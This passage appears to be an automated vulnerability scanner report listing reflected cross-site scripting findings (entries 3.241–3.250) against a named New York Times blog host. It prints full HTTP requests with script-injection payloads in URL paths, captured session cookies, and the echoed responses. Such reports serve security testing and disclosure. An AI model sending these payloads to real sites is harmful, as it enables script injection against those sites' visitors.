<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/timothy-egan/feede964d\"><script>alert(1)</script>f79359d6b0&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.241. http://opinionator.blogs.nytimes.com/category/timothy-egan/page/2/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/timothy-egan/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ac49"><script>alert(1)</script>1b9e43a9f36 was submitted in the REST URL parameter 3. This input was echoed as 1ac49\"><script>alert(1)</script>1b9e43a9f36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/timothy-egan/page1ac49"><script>alert(1)</script>1b9e43a9f36/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:18:21 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:18:21 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/timothy-egan/page1ac49\"><script>alert(1)</script>1b9e43a9f36/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.242. http://opinionator.blogs.nytimes.com/category/townie [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/townie

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 653c1"><script>alert(1)</script>00cb55aad01 was submitted in the REST URL parameter 2. This input was echoed as 653c1\"><script>alert(1)</script>00cb55aad01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/townie653c1"><script>alert(1)</script>00cb55aad01 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:30:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:30:30 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/townie653c1\"><script>alert(1)</script>00cb55aad01&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.243. http://opinionator.blogs.nytimes.com/category/townie/page/2/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/townie/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3998c"><script>alert(1)</script>804d504196d was submitted in the REST URL parameter 3. This input was echoed as 3998c\"><script>alert(1)</script>804d504196d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/townie/page3998c"><script>alert(1)</script>804d504196d/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:32:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:32:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/townie/page3998c\"><script>alert(1)</script>804d504196d/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.244. http://opinionator.blogs.nytimes.com/category/townies/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/townies/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7175"><script>alert(1)</script>281342d2c15 was submitted in the REST URL parameter 2. This input was echoed as f7175\"><script>alert(1)</script>281342d2c15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/towniesf7175"><script>alert(1)</script>281342d2c15/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:31:45 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:31:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/towniesf7175\"><script>alert(1)</script>281342d2c15&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.245. http://opinionator.blogs.nytimes.com/category/townies/feed [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/townies/feed

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3897"><script>alert(1)</script>cd639f55f19 was submitted in the REST URL parameter 3. This input was echoed as b3897\"><script>alert(1)</script>cd639f55f19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/townies/feedb3897"><script>alert(1)</script>cd639f55f19 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:30:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:30:10 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/townies/feedb3897\"><script>alert(1)</script>cd639f55f19&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.246. http://opinionator.blogs.nytimes.com/category/william-d-cohan [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/william-d-cohan

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e940"><script>alert(1)</script>09358cb3c30 was submitted in the REST URL parameter 2. This input was echoed as 7e940\"><script>alert(1)</script>09358cb3c30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/william-d-cohan7e940"><script>alert(1)</script>09358cb3c30 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:17:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:17:31 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/william-d-cohan7e940\"><script>alert(1)</script>09358cb3c30&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.247. http://opinionator.blogs.nytimes.com/category/william-d-cohan/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/william-d-cohan/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 274ad"><script>alert(1)</script>46fc10d5243 was submitted in the REST URL parameter 2. This input was echoed as 274ad\"><script>alert(1)</script>46fc10d5243 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/william-d-cohan274ad"><script>alert(1)</script>46fc10d5243/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:17:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:17:50 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/william-d-cohan274ad\"><script>alert(1)</script>46fc10d5243&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.248. http://opinionator.blogs.nytimes.com/category/william-d-cohan/feed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/william-d-cohan/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9efda"><script>alert(1)</script>ebb295baa3a was submitted in the REST URL parameter 3. This input was echoed as 9efda\"><script>alert(1)</script>ebb295baa3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/william-d-cohan/feed9efda"><script>alert(1)</script>ebb295baa3a/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:14:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:14:11 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/william-d-cohan/feed9efda\"><script>alert(1)</script>ebb295baa3a&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.249. http://opinionator.blogs.nytimes.com/category/william-d-cohan/page/2/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/william-d-cohan/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53f76"><script>alert(1)</script>4e42a0845ae was submitted in the REST URL parameter 3. This input was echoed as 53f76\"><script>alert(1)</script>4e42a0845ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/william-d-cohan/page53f76"><script>alert(1)</script>4e42a0845ae/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:18:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:18:26 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/william-d-cohan/page53f76\"><script>alert(1)</script>4e42a0845ae/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.250. http://opinionator.blogs.nytimes.com/tag/alan-simpson/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /tag/alan-simpson/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c449"><script>alert(1)</script>aa03640b195 was submitted in the REST URL parameter 2. This input was echoed as 6c449\"><script>alert(1)</script>aa03640b195 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/alan-simpson6c449"><script>alert(1)</script>aa03640b195/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:34:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
